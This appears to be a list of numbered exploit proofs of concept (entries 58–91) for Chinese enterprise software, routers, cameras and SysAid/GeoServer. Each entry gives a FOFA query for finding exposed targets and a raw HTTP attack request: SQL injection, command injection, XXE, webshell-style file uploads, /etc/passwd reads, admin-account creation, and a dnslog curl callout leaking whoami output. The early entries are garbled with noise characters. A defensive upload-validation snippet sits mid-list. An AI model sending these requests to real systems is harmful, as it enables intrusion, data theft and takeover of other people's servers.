58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

& X$ P4 W5 ?2 }" x1 Q59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
! i/ _0 p0 G8 d+ e/ r6 iFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"* ~  P4 `" W5 J7 {* _( l2 j1 i
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
+ H- r2 F8 D0 i+ T+ bHost: 192.168.86.128:90907 s2 m# U. y. y- E
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.361 s4 s. O; s9 i' u- s3 p
Connection: close- N( f. ]9 r  g
Content-Length: 1669
: a* g% T5 e# {3 iAccept: */*/ V( V- o) ]0 G% U2 T% L
Accept-Language: en
) E' ~$ E8 c) |! R) Q* Z" X8 R+ cContent-Type: application/x-www-form-urlencoded
, m# P( M  @( m+ O* g6 h3 Z# j4 pAccept-Encoding: gzip6 i  r3 p- ?. N" z  x$ F7 ~

5 N' R2 K  m# B& J9 d) LPAYLOAD
* [+ p+ {' q: g# ^
! C# w) Y- U* P! f6 t$ M/ C
, r- I& G( m/ R( D0 W60. 百卓Smart管理平台 importexport.php SQL注入
/ C! }; q( v/ F7 S! s8 v1 FFOFA:title="Smart管理平台"
- p  T/ c: l5 `2 l, W" ?8 u2 JGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.10 |/ p6 b6 ?8 N& }" I
Host:" S8 e& a8 B3 y& L/ e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.366 ^$ U& W- m" v3 P% v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 z$ d' _+ v; z- |6 x9 P# zAccept-Encoding: gzip, deflate
0 w( Q! n5 F5 k, OAccept-Language: zh-CN,zh;q=0.9: W4 j# Y+ W7 ^3 n
Connection: close
7 M# L% o& G% E2 V# I* y& H. u! }; p. T
# r3 @5 a7 B3 X$ B( }* _
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传0 Q, a+ [# M0 j4 I
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
# _$ Q2 I6 y9 U/ z& }. Y# y. R# JPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
, ?, m/ }  q+ B( }: J3 i; [4 XHost: x.x.x.x0 F( X* s4 ^. V7 e" D9 s6 O8 L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ k$ N# g; |- V2 J9 Z# K7 N) MConnection: close% I' T! @  R) F8 z! ^
Content-Length: 27: m7 l2 t2 e% ^4 S+ V" m3 X  Q
Accept: */*$ `* R. m* m  d7 L4 K& N  [2 T; V
Accept-Encoding: gzip, deflate
9 r' N6 I( u! f0 y) N/ q& ?Accept-Language: en
, |, `/ [  l* r' F- x9 P! eContent-Type: application/x-www-form-urlencoded
: v* L8 `  s6 O: m7 G- i3 x: K6 G& F
- @* \& h1 ?# M( m$ M1 f$ p8uxssX66eqrqtKObcVa0kid98xa( i  m3 f6 {& F& a+ ]3 u
& ]9 n* _6 h8 B4 p/ A
5 W+ s4 {; C* o0 I- c6 a) G8 j
62. IP-guard WebServer 远程命令执行
, P  D8 Y1 @  O6 r6 s9 V1 `% X) wFOFA:"IP-guard" && icon_hash="2030860561"# ]( g! H2 Y% v0 ~9 `8 O, _
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.17 ?+ z+ ~1 \( X$ ~! @
Host: x.x.x.x
( s, `- g+ ]0 T/ `) h) O; bUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
/ `5 ]. d6 N, O, b4 o1 [+ sConnection: close
! y5 I9 ^. W* a- AAccept: */*# Y% k! V! s2 l* A
Accept-Language: en
/ X3 ]5 {7 l% M6 P) VAccept-Encoding: gzip  U0 ~$ _& I) P
3 d5 Q' Z' x! I) Q) {

) E, u) B  H* @访问9 y( N; P' p) l; z3 `
7 F+ w4 [! t/ e
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
; N3 H# K: \' x# R5 MHost: x.x.x.x8 g& d% B6 B$ y- `! U" H/ e8 T

* [5 U7 w& ?- z6 d  c: G5 g0 r! g. R7 X0 D( M8 b, V
63. IP-guard WebServer任意文件读取
: {) `/ _7 f* G& O/ T* R7 @8 {IP-guard < 4.82.0609.0
$ `& X$ g9 U1 i4 F5 ~+ V0 t! m* wFOFA:icon_hash="2030860561"+ S7 {7 e7 \% q, h
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1. m8 u; p2 y' z4 V! Z
Host: your-ip
5 c( d3 i. F, W3 @- l1 V' uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
1 u+ W( j4 H, DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: p" h- ]% {3 H
Accept-Encoding: gzip, deflate" ]/ o1 A, v) }  V. K$ J
Accept-Language: zh-CN,zh;q=0.9
! o+ ]2 J( }1 v2 JConnection: close" J' ~0 ]- m- n$ {% a  m  I
Content-Type: application/x-www-form-urlencoded) A0 z$ L0 [$ z- Z7 \( o
6 u8 y# [, Y" Q; n  l# \
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A5 l5 g6 t9 `) f" `' h
; _6 r- R8 ?7 f7 m, f7 x7 M
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
; G) L+ y& K3 C+ ]FOFA:body="/Scripts/EnjoyMsg.js"
) Y1 ]0 }4 f: r' n# n8 gPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
/ I& l3 A; `- R+ X# `4 {Host: 192.168.86.128:9001
0 c  @5 J( `# l/ GUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
3 b2 \( H! X( l9 v, ?( q& ?Connection: close2 e  X- O/ A- o
Content-Length: 369! t3 c- L& Z% U/ w7 r. X: d0 U
Accept: */*
& S1 [& D/ ^& m, @* u0 zAccept-Language: en
8 j5 a/ c- @" A4 A! UContent-Type: text/xml; charset=utf-8
: B4 ?7 m7 G# OAccept-Encoding: gzip( O6 _6 o5 k5 o6 r) b) }5 V/ @
* b% }0 Q5 F. g6 T! O5 r
<?xml version="1.0" encoding="utf-8"?># e7 R6 f4 w. b3 H# Z. B
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">5 g& X# B1 z3 g1 [& d
<soap:Body>9 w& Y$ H( I- r$ ~; C; X# Q. P
    <GetOSpById xmlns="http://tempuri.org/">
  m- V4 {6 M4 a  J% p) y. v+ ]  |      <sId>1';waitfor delay '0:0:5'--+</sId>
9 s9 O1 f# l, j3 _5 {5 b6 g6 G! {' Y/ \    </GetOSpById>/ d# p$ C5 n) V# B( B
  </soap:Body>! S; H& ~: @- d( B
</soap:Envelope>
3 e& X. I, W: E" s$ E7 W( s

65. 优卡特脸爱云一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 has been created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it plants a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php
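
Entries 61, 67, 78, 80 and 87 above all let the request choose the file name, the target directory or a suffix, and the upload lands under the web root. As an added mitigation example, not code from any of those products, the Python below shows the checks an upload handler needs on the server side: a bare file name with a single allow-listed extension, a relative directory with no '..' segment, and a containment check on the fully resolved path. The upload root /srv/app/uploads, the extension lists and the helper names are this example's own assumptions; the test inputs are the values from those entries' request lines.

```python
import os
import posixpath
import re

# Extensions the application legitimately accepts (assumed for this example);
# anything else is refused.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".pdf", ".txt", ".xlsx"}
# Server-side script types seen in the POCs above; refused outright even if
# ALLOWED_EXTENSIONS is widened by mistake later.
SCRIPT_EXTENSIONS = {".jsp", ".jspx", ".aspx", ".asp", ".ashx", ".asmx", ".php"}
# A bare file name: one stem, one extension, no separators, no second dot.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,8}")


class UploadRejected(ValueError):
    """Raised when a caller-supplied file name or directory fails validation."""


def resolve_upload_path(upload_root, user_dir, user_filename):
    """Return the absolute path an upload may be written to, or raise.

    upload_root   -- directory outside the web root that holds uploads
                     (assumed location for this example)
    user_dir      -- relative sub-directory supplied by the client, may be ""
    user_filename -- file name supplied by the client
    """
    root = os.path.realpath(upload_root)

    # 1. File name must be a bare name: no '/', '\\', '..' or double extension.
    name = user_filename.replace("\\", "/")
    if posixpath.basename(name) != name or not NAME_RE.fullmatch(name):
        raise UploadRejected("file name must be a bare 'stem.ext' name")
    ext = os.path.splitext(name)[1].lower()
    if ext in SCRIPT_EXTENSIONS or ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension {ext!r} is not allowed")

    # 2. Directory must be relative and must not contain a '..' segment.
    rel_dir = user_dir.replace("\\", "/")
    if rel_dir.startswith("/") or ".." in rel_dir.split("/"):
        raise UploadRejected("directory must be relative and free of '..'")

    # 3. Resolve and re-check containment, so symlinks or normalisation
    #    cannot move the final path outside the upload root.
    candidate = os.path.realpath(os.path.join(root, rel_dir, name))
    if os.path.commonpath([root, candidate]) != root:
        raise UploadRejected("resolved path escapes the upload root")
    return candidate


def is_accepted(upload_root, user_dir, user_filename):
    """Boolean wrapper around resolve_upload_path for quick checks."""
    try:
        resolve_upload_path(upload_root, user_dir, user_filename)
        return True
    except UploadRejected:
        return False


# Inputs taken from the request lines of entries 61, 67, 78, 80 and 87,
# plus one benign upload. For entry 67 the file name is made benign so that
# the directory check, not the extension check, is what rejects it.
UPLOAD_ROOT = "/srv/app/uploads"  # assumed path
CASES = [
    ("entry 61 filename", "", "8uxssX66eqrqtKObcVa0kid98xa.jsp"),
    ("entry 67 dir", "../platform/portal/layout/", "apoxkq.png"),
    ("entry 78 target", "/Applications/SkillDevelopAndEHS/", "ok.txt"),
    ("entry 80 report", "", "../xykqmfxpoas.jsp"),
    ("entry 87 suffix", "", "/../../../jfhatuwe.php"),
    ("benign", "reports/2024", "q1.png"),
]


def evaluate_cases():
    """Map each case label to True (accepted) or False (rejected)."""
    return {label: is_accepted(UPLOAD_ROOT, d, f) for label, d, f in CASES}


if __name__ == "__main__":
    for label, ok in evaluate_cases().items():
        print(f"{label:18} -> {'accepted' if ok else 'rejected'}")
```

The order of the checks matters less than the fact that all three run: the extension check alone would still let entry 78's absolute `target` and entry 67's `../` directory through, and a directory check alone would still accept a `.jsp` name. Keeping the upload root outside the servlet or document root, as assumed here, means that even a file that slips past the name checks is never served as code.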

88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
